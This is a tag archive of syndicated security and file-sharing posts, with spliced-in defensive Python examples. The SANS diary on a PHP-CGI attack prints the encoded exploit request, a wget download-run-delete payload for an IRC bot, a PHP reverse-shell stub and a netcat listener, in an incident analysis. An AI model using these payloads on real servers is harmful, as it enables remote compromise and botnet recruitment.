Posts tagged ‘ip address’

LWN.net: Linux Kernel Git Repositories Add 2-Factor Authentication (Linux.com)

This post was syndicated from: LWN.net and was written by: ris. Original post: at LWN.net

Linux.com takes a look at using 2-factor authentication for commit access to kernel git repositories. “Having the technology available is one thing, but how to incorporate it into the kernel development process — in a way that doesn’t make developers’ lives painful and unbearable? When we asked them, it became abundantly clear that nobody wanted to type in 6-digit codes every time they needed to do a git remote operation. Where do you draw the line between security and usability in this case?

We looked at the options available in gitolite, the git repository management solution used at kernel.org, and found a way that allowed us to trigger additional checks only when someone performed a write operation, such as “git push.” Since we already knew the username and the remote IP address of the developer attempting to perform a write operation, we put together a verification tool that allowed developers to temporarily whitelist their IP addresses using their 2-factor authentication token.”
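The mechanism the quote describes (check only on write operations, let a developer unlock their current source address for a while with a TOTP code) can be sketched in a few dozen lines. The following is an added example, not kernel.org's verification tool or gitolite code: the whitelist lifetime, the in-memory store and the function names are this example's own assumptions, and the secret used in the demo is the RFC 6238 test secret.

```python
"""Temporary, TOTP-unlocked IP whitelist for write operations, in the spirit of the
kernel.org/gitolite approach described above.

Added example: this is not kernel.org's verification tool. The whitelist lifetime,
the in-memory store and the names below are this example's own assumptions.
"""
import hashlib
import hmac
import struct
import time

TOTP_STEP = 30            # seconds per TOTP step (RFC 6238 default)
TOTP_DIGITS = 6           # the "6-digit codes" mentioned in the article
WHITELIST_TTL = 24 * 3600  # assumed lifetime of an unlocked address; not from the article


def hotp(secret, counter):
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** TOTP_DIGITS).zfill(TOTP_DIGITS)


def totp(secret, now=None):
    """RFC 6238 TOTP: HOTP over the number of 30-second steps since the Unix epoch."""
    now = time.time() if now is None else now
    return hotp(secret, int(now // TOTP_STEP))


def verify_totp(secret, code, now=None, window=1):
    """Accept the current step and +/-window neighbours (clock drift); constant-time compare."""
    now = time.time() if now is None else now
    counter = int(now // TOTP_STEP)
    return any(hmac.compare_digest(hotp(secret, counter + d), code)
               for d in range(-window, window + 1))


class WriteWhitelist:
    """Per-user set of source addresses allowed to push, each with an expiry time.

    Read operations never consult the whitelist, which is what keeps the
    day-to-day git workflow free of 2-factor prompts.
    """

    def __init__(self):
        self.entries = {}   # user -> {ip: expires_at}

    def unlock(self, user, ip, secret, code, now):
        """Whitelist (user, ip) for WHITELIST_TTL seconds if the TOTP code is valid."""
        if not verify_totp(secret, code, now):
            return False
        self.entries.setdefault(user, {})[ip] = now + WHITELIST_TTL
        return True

    def allows(self, user, ip, operation, now):
        """Gate a git operation: reads always pass, writes need a live whitelist entry."""
        if operation != "write":
            return True
        expires_at = self.entries.get(user, {}).get(ip)
        return expires_at is not None and now < expires_at


if __name__ == "__main__":
    # Constructed demo values: the RFC 6238 test secret and a TEST-NET-3 address.
    secret = b"12345678901234567890"
    wl = WriteWhitelist()
    print("push before unlock:", wl.allows("dev", "203.0.113.9", "write", now=59))
    print("unlock with TOTP:", wl.unlock("dev", "203.0.113.9", secret, totp(secret, 59), now=59))
    print("push after unlock:", wl.allows("dev", "203.0.113.9", "write", now=60))
    print("push from another address:", wl.allows("dev", "203.0.113.10", "write", now=60))
```

In a real deployment the entries would live in a file or database that the gitolite update hook reads, keyed on the username and remote address the SSH layer already knows, so a read-only fetch never touches the 2-factor path at all.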

SANS Internet Storm Center, InfoCON: green: Part 2: Is your home network unwittingly contributing to NTP DDOS attacks?, (Sun, Aug 17th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

This diary follows from Part 1, published on Sunday August 17, 2014.  

How is it possible that, with no port forwarding enabled through the firewall, Internet-originated NTP requests were getting past the firewall to the misconfigured NTP server?

The reason these packets pass the firewall is that the manufacturer of the gateway router, in this case Pace, implemented full-cone NAT as an alternative to UPnP.

What is full-cone NAT?

The secret is in these settings in the gateway router:

If strict UDP Session Control were enabled, the firewall would treat outbound UDP transactions as I described earlier. When a device on your network initiates an outbound connection to a server, responses from that server are permitted back into your network. Since UDP is stateless, most firewalls simulate state with a timeout: if no traffic is seen between the device and the server for 600 seconds, no further responses from the server are permitted until there is new outbound traffic. But any time related traffic is seen on the correct port the timer is reset to 600 seconds, making it possible for this communication to continue virtually forever as long as one or both devices keep talking. Visually that looks like:

However, if UDP Session Control is disabled, as it is in this device, then the device implements full-cone NAT (RFC 3489). Full-cone NAT allows any external host to use the inbound window opened by the outbound traffic until the timer expires.

Remember, any time traffic is seen on the correct port the timer is reset to 600 seconds, so this communication can continue virtually forever as long as one or both devices continue to communicate.

The really quick among you will have realized that this is not normally a big problem, since the only port exposed is the original ephemeral source port and it is waiting for an NTP reply. It is not likely to be used as an NTP reflector. But the design of the NTP protocol can contribute to this problem.

Symmetric Mode NTP

There is a mode of NTP called symmetric NTP in which, instead of the originating device picking an ephemeral port for the outbound connection, both the source and the destination ports use 123. The traffic flow would look like:

Symmetric NTP opens up the misconfigured server to being an NTP reflector. Assuming there is an NTP server running on the originating machine on UDP port 123, if an attacker can find this open NTP port before the timeout window closes, they can send in NTP queries which will pass the firewall and be answered by the NTP server. If the source IP address is spoofed, the replies will not go back to the attacker but to a victim instead.

Of course, UDP is stateless, so the source IP can be spoofed, and there is no way for the receiver of the NTP request to validate the source IP or source port, permitting the attacker to direct the attack against any IP and port on the Internet. It is exceedingly difficult to trace these attacks back to the source, so the misconfigured server behind the full-cone NAT will get the blame. As long as the attacker sends at least one packet every 600 seconds he can hold the session open virtually forever and use this device to wreak havoc on unsuspecting victims. We have seen indications of attackers holding these communications open for months.
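The difference between the two gateway policies, and the effect of the 600-second idle timer being reset by any traffic, is easiest to see in a small simulation. The following is an added example and not part of the diary: the gateway model (port-preserving NAT, one mapping per external port), the function names and the addresses (TEST-NET documentation ranges) are constructed for illustration.

```python
"""Simulate a gateway's UDP handling with "strict UDP session control" (address-
restricted NAT) versus full-cone NAT (RFC 3489), with the 600-second idle timer the
diary describes, and replay the symmetric-mode NTP scenario against both.

Added example, not the diary's code: the gateway model, function names and the
addresses (TEST-NET ranges) are constructed for illustration.
"""
from dataclasses import dataclass, field

IDLE_TIMEOUT = 600          # seconds; the timer value quoted in the diary


@dataclass
class Mapping:
    internal: tuple         # (ip, port) of the LAN host that opened the pinhole
    remote: tuple           # (ip, port) of the Internet host it first sent to
    expires_at: float       # mapping is torn down once the clock passes this


@dataclass
class Gateway:
    strict_udp: bool                                   # True = restricted, False = full-cone
    table: dict = field(default_factory=dict)          # external port -> Mapping

    def outbound(self, internal, remote, now):
        """LAN host sends a datagram; open or refresh the external mapping.
        Port-preserving NAT is assumed: the external port equals the LAN source port."""
        ext_port = internal[1]
        mapping = self.table.get(ext_port)
        if mapping is None or mapping.internal != internal:
            mapping = Mapping(internal, remote, now + IDLE_TIMEOUT)
            self.table[ext_port] = mapping
        mapping.expires_at = now + IDLE_TIMEOUT
        return ext_port

    def inbound(self, src, ext_port, now):
        """Internet host src=(ip, port) sends to our external port.
        Returns the LAN destination if forwarded, None if dropped."""
        mapping = self.table.get(ext_port)
        if mapping is None:
            return None
        if now >= mapping.expires_at:            # idle timer ran out: pinhole closed
            del self.table[ext_port]
            return None
        if self.strict_udp and src != mapping.remote:
            return None                          # restricted: only the host we talked to may answer
        mapping.expires_at = now + IDLE_TIMEOUT  # any traffic on the port resets the timer
        return mapping.internal


LAN_NTP = ("192.168.1.10", 123)       # misconfigured NTP server behind the gateway (constructed)
PEER = ("203.0.113.5", 123)           # legitimate symmetric-mode peer (TEST-NET-3)
OUTSIDER = ("198.51.100.77", 40000)   # unrelated Internet host (TEST-NET-2)


def legitimate_reply_forwarded(strict_udp):
    """The peer's reply must get through under either policy."""
    gw = Gateway(strict_udp)
    ext = gw.outbound(LAN_NTP, PEER, now=0)
    return gw.inbound(PEER, ext, now=50) == LAN_NTP


def pinhole_closes_when_idle(strict_udp):
    """With nobody talking for 600 s the mapping disappears."""
    gw = Gateway(strict_udp)
    ext = gw.outbound(LAN_NTP, PEER, now=0)
    return gw.inbound(PEER, ext, now=600) is None


def outsider_scenario(strict_udp, keepalive_interval=500, horizon=86400):
    """Symmetric-mode NTP: the LAN server talks to PEER from source port 123, then an
    unrelated host hits that port and keeps sending one datagram per
    keepalive_interval while the LAN host stays silent.
    Returns (first_datagram_forwarded, still_forwarded_at_horizon)."""
    gw = Gateway(strict_udp)
    ext = gw.outbound(LAN_NTP, PEER, now=0)
    t = 100
    forwarded = gw.inbound(OUTSIDER, ext, now=t) is not None
    first = forwarded
    while forwarded and t < horizon:
        t += keepalive_interval
        forwarded = gw.inbound(OUTSIDER, ext, now=t) is not None
    return first, forwarded


if __name__ == "__main__":
    for strict in (True, False):
        label = "strict UDP session control" if strict else "full-cone NAT"
        print(f"{label}: outsider (first, after a day) = {outsider_scenario(strict)}")
```

With the strict policy the outsider's datagrams are dropped from the first one; with full-cone NAT they are forwarded, and because each one resets the timer the pinhole stays open for the whole simulated day even though the LAN host never sends again. Raising the outsider's interval above 600 seconds lets the mapping expire, which is the timer behaviour the diary relies on.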

What are the lessons to be learned here?

  • If all ISPs fully implemented anti-spoofing filters, the likelihood of this sort of attack would be lowered substantially. In a nutshell, anti-spoofing says that if traffic is headed into my network and the source IP address is from my network, then the source IP must be spoofed, so drop the packet. It also works in the converse: if a packet is leaving my network and the source IP address is not from my network, then the source IP address must be spoofed, so drop the packet.
  • It can’t hurt to check your network for NTP servers. A single nmap command, run against your own address range, will quickly confirm whether any are open: nmap -sU -A -n -PN -pU:123 --script=ntp-monlist. If you find one or more, perhaps you can contact the vendor for possible resolution.
  • If you own a gateway router that implements full-cone NAT, you may want to see if it implements the equivalent of the Pace “Strict UDP Session Control”. This will prevent an attacker from accessing misconfigured UDP servers on your network.
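The anti-spoofing rule in the first lesson is direction-dependent, which is what makes it easy to get wrong in a filter. The following is an added example, not the diary's code, showing both directions of the check over a handful of constructed packets; the prefixes (TEST-NET and the IPv6 documentation range) and the function names are this example's own, and it covers IPv6 as well as the IPv4 case in the text.

```python
"""Anti-spoofing (BCP 38 style) source-address filter as described above: drop
packets entering my network that claim one of my own source addresses, and drop
packets leaving my network whose source address is not mine.

Added example, not the diary's code. Prefixes, packets and names are constructed.
"""
import ipaddress

# Prefixes this network is responsible for (constructed; IPv4 and IPv6 both handled).
MY_PREFIXES = [ipaddress.ip_network(p)
               for p in ("192.0.2.0/24", "198.51.100.0/24", "2001:db8::/32")]


def is_my_address(ip):
    """True if ip falls inside one of MY_PREFIXES (version mismatches never match)."""
    addr = ipaddress.ip_address(ip)
    return any(addr.version == net.version and addr in net for net in MY_PREFIXES)


def verdict(direction, src_ip):
    """direction is 'ingress' (Internet -> my network) or 'egress' (my network -> Internet)."""
    mine = is_my_address(src_ip)
    if direction == "ingress" and mine:
        return "drop"        # my own addresses cannot legitimately arrive from outside
    if direction == "egress" and not mine:
        return "drop"        # anything leaving must carry one of my addresses
    return "forward"


def filter_packets(packets):
    """packets: iterable of (direction, src_ip, dst_ip). Returns (forwarded, dropped)."""
    forwarded, dropped = [], []
    for direction, src, dst in packets:
        bucket = forwarded if verdict(direction, src) == "forward" else dropped
        bucket.append((direction, src, dst))
    return forwarded, dropped


SAMPLE_PACKETS = [                                       # constructed
    ("ingress", "203.0.113.9", "192.0.2.10"),            # normal inbound traffic
    ("ingress", "192.0.2.77", "192.0.2.10"),             # claims my address from outside: spoofed
    ("egress", "192.0.2.10", "203.0.113.9"),             # normal outbound traffic
    ("egress", "203.0.113.200", "198.51.100.5"),         # leaves me with a foreign source: spoofed
    ("egress", "2001:db8::1", "2001:db8:ffff::1"),       # IPv6 outbound from my prefix
]


if __name__ == "__main__":
    ok, bad = filter_packets(SAMPLE_PACKETS)
    print("forwarded:", ok)
    print("dropped  :", bad)
```

The egress half is the one that stops a network from sourcing the spoofed NTP queries in the first place; the ingress half protects the network's own hosts from packets pretending to come from inside.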

– Rick Wanner – rwanner at isc dot sans dot edu- http://namedeplume.blogspot.com/ – Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

SANS Internet Storm Center, InfoCON: green: Web Server Attack Investigation – Installing a Bot and Reverse Shell via a PHP Vulnerability, (Sat, Aug 16th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

With Windows malware getting so much attention nowadays, it’s easy to forget that attackers also target other OS platforms. Let’s take a look at a recent attempt to install an IRC bot written in Perl by exploiting a vulnerability in PHP.

The Initial Probe

The web server received the initial probe from 46.41.128.231, an IP address that at the time was not flagged as malicious on various blacklists:

HEAD / HTTP/1.0

The connection lacked the headers typically present in an HTTP request, which is why the web server’s firewall blocked it with a 403 Forbidden HTTP status code. However, that response was sufficient for the attacker’s tool to confirm that it had located a web server.

The Exploitation Attempt

The offending IP address initiated another connection to the web server approximately 4 hours later. This time, the request was less gentle than the initial probe:

POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25
Content-Type: application/x-www-form-urlencoded

As shown above, the attacking system attempted to access /cgi-bin/php on the targeted server. The parameter supplied to /cgi-bin/php, when its percent-encoded hexadecimal bytes are decoded to ASCII (each + is a space), corresponds to this:

-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

These parameters, when supplied to a vulnerable version of /cgi-bin/php, are designed to dramatically reduce the security of the PHP configuration on the system. We covered a similar pattern in our 2012 diary when describing the CVE-2012-1823 vulnerability in PHP. The fix to that vulnerability was poorly implemented, which resulted in the CVE-2012-2311 vulnerability that affected “PHP before 5.3.13 and 5.4.x before 5.4.3, when configured as a CGI script,” according to MITRE. The ISS advisory noted that,

“PHP could allow a remote attacker to execute arbitrary code on the system, due to an incomplete fix for an error related to parsing PHP CGI configurations. An attacker could exploit this vulnerability to execute arbitrary code on the system.”

SpiderLabs documented a similar exploitation attempt in 2013, where they clarified that “one of the key modifications is to specify ‘auto_prepend_file=php://input‘ which will allow the attacker to send PHP code in the request body.”
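For log review it helps to decode such a request line the way the CGI gateway does and flag the php.ini overrides it carries. The following is an added example, not the diary's code and not taken from any exploit: the sample request line is the one captured above, while the directive descriptions, the verdict rule and the function names are this example's own.

```python
"""Decode and flag a PHP-CGI argument-injection request line (the CVE-2012-1823 /
CVE-2012-2311 pattern shown above) for log review.

Added example, not the diary's code. The sample request line is the one captured
in the diary; the directive descriptions and function names are this example's own.
"""
from urllib.parse import unquote

# Request line captured in the diary (query string copied verbatim).
SAMPLE_REQUEST_LINE = (
    "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+"
    "%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+"
    "%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+"
    "%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+"
    "%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+"
    "%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+"
    "%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+"
    "%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+"
    "%2D%6E HTTP/1.1"
)

# php.ini directives whose command-line override weakens the interpreter.
# This list is the example's own summary, not taken from the diary.
RISKY_DIRECTIVES = {
    "auto_prepend_file": "runs the named file/stream before the script; php://input is the request body",
    "allow_url_include": "lets include()/require() load remote URLs and streams",
    "safe_mode": "switches off the (legacy) safe-mode restrictions",
    "disable_functions": "clearing it re-enables system(), exec() and friends",
    "open_basedir": "removes the filesystem path restriction",
    "cgi.force_redirect": "disables the protection against calling the CGI binary directly",
    "cgi.redirect_status_env": "companion setting to cgi.force_redirect",
    "suhosin.simulation": "puts the Suhosin hardening patch into log-only mode",
}


def cgi_argv(query):
    """Split a query string the way an RFC 3875 CGI gateway builds command-line
    arguments: only when the query contains no unencoded '=', split on '+' and
    percent-decode each piece. Encoding '=' as %3D is what triggers that path."""
    if "=" in query:
        return []
    return [unquote(piece) for piece in query.split("+") if piece]


def ini_overrides(argv):
    """Collect directive=value pairs given as '-d directive=value' or '-ddirective=value'."""
    overrides = {}
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg == "-d" and i + 1 < len(argv):
            setting, i = argv[i + 1], i + 2
        elif arg.startswith("-d") and len(arg) > 2:
            setting, i = arg[2:], i + 1
        else:
            i += 1
            continue
        name, _, value = setting.partition("=")
        overrides[name] = value
    return overrides


def analyse_request_line(line):
    """Return path, decoded argv, overrides, risky findings and a verdict for one request line."""
    _method, target, _version = line.split(" ", 2)
    path, _, query = target.partition("?")
    argv = cgi_argv(query)
    overrides = ini_overrides(argv)
    findings = {name: RISKY_DIRECTIVES[name] for name in overrides if name in RISKY_DIRECTIVES}
    return {
        "path": path,
        "argv": argv,
        "overrides": overrides,
        "findings": findings,
        # Verdict rule (this example's own): a PHP CGI binary addressed directly,
        # with php.ini overrides smuggled in through the query string.
        "suspicious": "php" in path.rsplit("/", 1)[-1] and bool(findings),
    }


if __name__ == "__main__":
    result = analyse_request_line(SAMPLE_REQUEST_LINE)
    print(" ".join(result["argv"]))
    for name, why in result["findings"].items():
        print(f"  {name}={result['overrides'][name]!r}: {why}")
    print("suspicious:", result["suspicious"])
```

A normal query such as page=1 contains an unencoded "=" and yields no argv at all, which is why the same function can run over an entire access log without flagging ordinary form submissions.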

The Exploit’s Primary Payload: Downloading a Bot

With the expectation that the initial part of the malicious POST request reconfigured PHP, the body of the request began with the following code:

<?php system("wget ip-address-redacted/speedtest/.a/hb/phpR05 -O /tmp/.bash_h1s7;perl /tmp/.bash_h1s7;rm -rf /tmp/.bash_h1s7 &"); ?>

If the exploit was successful, this code would direct the targeted server to download /.a/hb/phpR05 from the attacker’s server, save the file as /tmp/.bash_h1s7, run it using Perl and then delete it. Searching the web for “phpR05” showed a file with this name being used in various exploitation attempts. One such example was very similar to the incident being described in this diary. (In a strange coincidence, that PHP attack was visible in the data that the server was leaking due to a Heartbleed vulnerability!)

The malicious Perl script was an IRC bot, and was recognized as such by several antivirus tools according to VirusTotal. Here’s a tiny excerpt from its code:

#####################
# Stealth Shellbot  #
#####################

sub getnick {
  return "Rizee|RYN|05|".int(rand(8999)+1000);
}

This bot was very similar to the one described by James Espinosa in 2013 in an article discussing Perl/ShellBot.B trojan activity, which began with attempts to exploit a phpMyAdmin file inclusion vulnerability.

The Exploit’s Secondary Payload: Reverse Shell

In addition to supplying instructions to download the IRC bot, the malicious POST request contained PHP code that implemented a reverse backdoor, directing the targeted web server to establish a connection to the attacker’s server on TCP port 22. That script began like this:

$ip = 'ip-address-redacted';
$port = 22;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';

Though the attacker specified port 22, the reverse shell didn’t use SSH. Instead, it expected the attacker’s server to listen on that port using a simple tool such as Netcat. Experimenting with this script and Netcat in a lab environment confirmed this, as shown in the following screenshot:

In this laboratory experiment, ‘nc -l -p 22’ directed Netcat to listen for connections on TCP port 22. Once the reverse shell script ran on the system that mimicked the compromised server, the simulated attacker had the ability to run commands on that server (e.g., ‘whoami’).

Interestingly, the production server’s logs showed that the system in the wild was listening on TCP port 22; however, it was actually running SSH there, so the reverse shell connection established by the malicious PHP script would have failed.

A bit of web searching revealed a script called ap-unlock-v1337.py, reportedly written in 2012 by “noptrix,” which was designed to exploit the PHP vulnerability outlined above. That script included the exact exploit code used in this incident and included the code that implemented the PHP-based reverse shell. The attacker probably used that script with the goal of installing the Perl-based IRC bot, ignoring the reverse shell feature of the exploit.

Wrap Up

The attack, probably implemented using an automated script that probed random IP addresses, was designed to build an IRC-based bot network. It targeted Unix systems that ran a version of PHP susceptible to a 2-year-old vulnerability. This recent incident suggests that there are still plenty of unpatched systems left to compromise. The attacker used an off-the-shelf exploit and an unrelated off-the-shelf bot, both of which were readily available on the Internet. The attacker’s infrastructure included 3 different IP addresses, none of which were blacklisted at the time of the incident.

– Lenny Zeltser

Lenny Zeltser focuses on safeguarding customers’ IT operations at NCR Corp. He also teaches how to analyze malware at SANS Institute. Lenny is active on Twitter and . He also writes a security blog, where he recently described other attacks observed on a web server.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: TalkTalk Wants Resellers to Warn Pirating Customers

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

Unlike those in the US, Internet providers in the UK are not obliged to forward copyright infringement notices to their subscribers. This means that local Internet users are spared the typical warnings that are so common elsewhere.

Despite the absence of a legal requirement, some anti-piracy groups do send copyright infringement notices to UK ISPs. In most cases these are ignored by the providers, but last week TalkTalk forwarded a notice to one of its resellers.

In the email the ISP asks Opal Solutions to forward the notice in question to one of its subscribers who allegedly shared a pirated copy of “Godzilla”. In addition the reseller was urged to take “preventive” measures, but what these should be is left open.

“Please see below copyright infringement email regarding an IP address of one of your clients, Please inform your client and take necessary preventative measures,” TalkTalk wrote.

At the bottom of this article is a copy of the original copyright infringement notice TalkTalk forwarded. It is a typical DMCA style notice sent by IP Echelon on behalf of Warner Bros.

IP Echelon didn’t make any effort to customize the notice for the UK audience. The email specifically references US copyright law, which doesn’t apply to the reseller or TalkTalk.

What’s most noteworthy, though, is that TalkTalk has decided to pass on this notice. The ISP is not known to forward these notices to its own subscribers, yet they appear to be urging a reseller to go beyond what’s required by law.

The forwarded email is most likely an attempt to avoid any type of liability. The question that remains is this: if TalkTalk do this with resellers does this mean they will start warning their subscribers as well?

Earlier this year the news broke that TalkTalk and other UK providers will voluntarily start sending infringement notices under the VCAP program. While VCAP isn’t going into effect before the summer of 2015, TalkTalk’s forwarded infringement notice could suggest that they might do something sooner.

Below is a full copy of the copyright infringement notice.

----

We are writing this message on behalf of Warner Bros. Entertainment Inc..

We have received information that an individual has utilized the
below-referenced IP address at the noted date and time to offer
downloads of copyrighted material.

The title in question is: Godzilla

The distribution of unauthorized copies of copyrighted television
programs constitutes copyright infringement under the Copyright Act,
Title 17 United States Code Section 106(3). This conduct may also
violate the laws of other countries, international law, and/or treaty
obligations.

Since you own this IP address
we request that you immediately do the following:

1) Contact the subscriber who has engaged in the conduct described
above and take steps to prevent the subscriber from further downloading
or uploading Warner Bros. Entertainment Inc. content without authorization; and

2) Take appropriate action against the account holder under your Abuse
Policy/Terms of Service Agreement.

On behalf of Warner Bros. Entertainment Inc., owner of the exclusive rights
in the copyrighted material at issue in this notice, we hereby state that
we have a good faith belief that use of the material in the manner
complained of is not authorized by Warner Bros. Entertainment Inc.,
its respective agents, or the law.

Also, we hereby state, under penalty of perjury, that we are authorized
to act on behalf of the owner of the exclusive rights being infringed
as set forth in this notification.

We appreciate your assistance and thank you for your cooperation in this
matter. Your prompt response is requested.

Any further enquiries can be directed to copyright@ip-echelon.com
Please include this message with your enquiry to ensure a swift response.

Respectfully,

Adrian Leatherland
CEO
IP-Echelon
Email: copyright@ip-echelon.com
Address: 6715 Hollywood Blvd, Los Angeles, 90028, United States

------------- Infringement Details -------------------------------
Title: Godzilla
Timestamp: 2014-08-13T14:06:26Z
IP Address:
Port: 60261
Type: BitTorrent
Torrent Hash: c5cdf551eea353484657d45dbe93f688575a1e31
Filename: Godzilla.2014.WEBRiP.XviD-VAiN
Filesize: 2485 MB
------------------------------------------------------------------

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

SANS Internet Storm Center, InfoCON: green: Something is amiss with the Interwebs! BGP is a flapping. , (Tue, Aug 12th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

[Update] See http://www.bgpmon.net/what-caused-todays-internet-hiccup/ for a good summary of what happened.

 

Tuesday morning, various networks experienced outages from 4-6am EDT (8-10am UTC) [1]. It appears the outage was the result of a somewhat anticipated problem with older routers and their inability to deal with the ever increasing size of the Internet’s routing table.

These BGP routers need to store a map of the Internet defining which IP address range belongs to which network. Due to the increasing scarcity of IPv4 space, registrars and ISPs assign smaller and smaller netblocks to customers, leading to a more and more fragmented topology. Many older routers are limited to storing 512k entries, and the Internet’s routing table has become large enough to reach this limit. Tuesday morning, it appears to have exceeded this limit for a short time [2][3].

The large number of route announcements and immediate removals shown in [2] could indicate malicious intent behind these events (or a simple configuration error), but either way they likely point to one entity “pushing” the size of the routing table beyond the 512k limit briefly. At around this time, one larger ISP (Windstream, AS7029) recovered from an unrelated outage, and routing changes due to the recovery are one suspect that may have triggered the event.

Vendors published guidance for users of older routers on how to avoid this issue [5]. This guidance has been available for a while. Please contact your vendor if you are affected. You may also want to consider upgrading your router. The routing table is likely going to get larger over the next few years until networks rely less on IPv4 and take advantage of IPv6.

 

[1] https://puck.nether.net/pipermail/outages/2014-August/007090.html
[2] http://www.cymru.com/BGP/prefix_delta.html (see the spike in deltas around that time)
[3] http://www.cidr-report.org/2.0/#General_Status (note how close it is to 512k and rising)
[4] http://www.thewhir.com/web-hosting-news/liquidweb-among-companies-affected-major-outage-across-us-network-providers
[5] http://www.cisco.com/c/en/us/support/docs/switches/catalyst-6500-series-switches/117712-problemsolution-cat6500-00.html
 

Cheers,

Adrien de Beaupré

Intru-shun.ca Inc.

My SANS Teaching Schedule

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: BTindex Exposes IP-Addresses of BitTorrent Users

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

Unless BitTorrent users are taking steps to hide their identities through the use of a VPN, proxy, or seedbox, their downloading habits are available for almost anyone to snoop on.

By design the BitTorrent protocol shares the location of any user in the swarm. After all, without knowing where to send the data nothing can be shared to begin with.

Despite this fairly common knowledge, even some experienced BitTorrent users can be shocked to learn that someone has been monitoring their activities, let alone that their sharing activity is being made public for the rest of the world to see.

Like it or not, this is exactly what the newly launched torrent search engine BTindex is doing.

Unlike most popular torrent sites BTindex adds new content by crawling BitTorrent’s DHT network. This is already quite unique as most other sites get their content from user uploads or other sites. However, the most controversial part without doubt is that the IP-addresses of BitTorrent users are being shared as well.

People who download a file from The Pirate Bay or any other torrent site expose their IP-addresses via the DHT network. BTindex records this information alongside the torrent metadata. The number of peers is displayed in the search results, and for each file a selection of IP-addresses is made available to the public.

The image below shows a selection of peers who shared a pirated copy of the movie “Transcendence,” this week’s most downloaded film.

Some IP-addresses sharing “Transcendence.”

Perhaps even more worrying to some, the site also gives an overview of all recorded downloads per IP-address. While the database is not exhaustive there is plenty of dirt to be found on heavy BitTorrent users who have DHT enabled in their clients.

Below is an example of the files that were shared via the IP-address of a popular VPN provider.

Files shared by the IP-address of a popular VPN provider

Since all data is collected through the DHT network people can avoid being tracked by disabling this feature in their BitTorrent clients. Unfortunately, that only gives a false sense of security as there are plenty of other monitoring firms who track people by gathering IP-addresses directly from the trackers.

The idea to index and expose IP-addresses of public BitTorrent users is not entirely new. In 2011 YouHaveDownloaded did something similar. This site generated considerable interest but was shut down a few months after its launch.

If anything, these sites should act as a wake up call to people who regularly share files via BitTorrent without countermeasures. Depending on the type of files being shared, a mention on BTindex is probably the least of their worries.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Linux How-Tos and Linux Tutorials: How to Image and Clone Hard Drives with Clonezilla

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Carla Schroder. Original post: at Linux How-Tos and Linux Tutorials

Figure 1: GParted

Clonezilla is a partition and disk cloning application for Linux, Free-, Net-, and OpenBSD, Mac OS X, Windows, and Minix. It supports all the major filesystems including EXT, NTFS, FAT, XFS, JFS, and Btrfs, LVM2, and VMWare’s enterprise clustering filesystems VMFS3 and VMFS5. Clonezilla supports 32- and 64-bit systems, both legacy and UEFI BIOS, and both MBR and GPT partition tables. It’s a good tool for backing up a complete Windows system with all of your installed applications, and I like it for making copies of Linux test systems so that I can trash them with mad experiments and then quickly restore them.

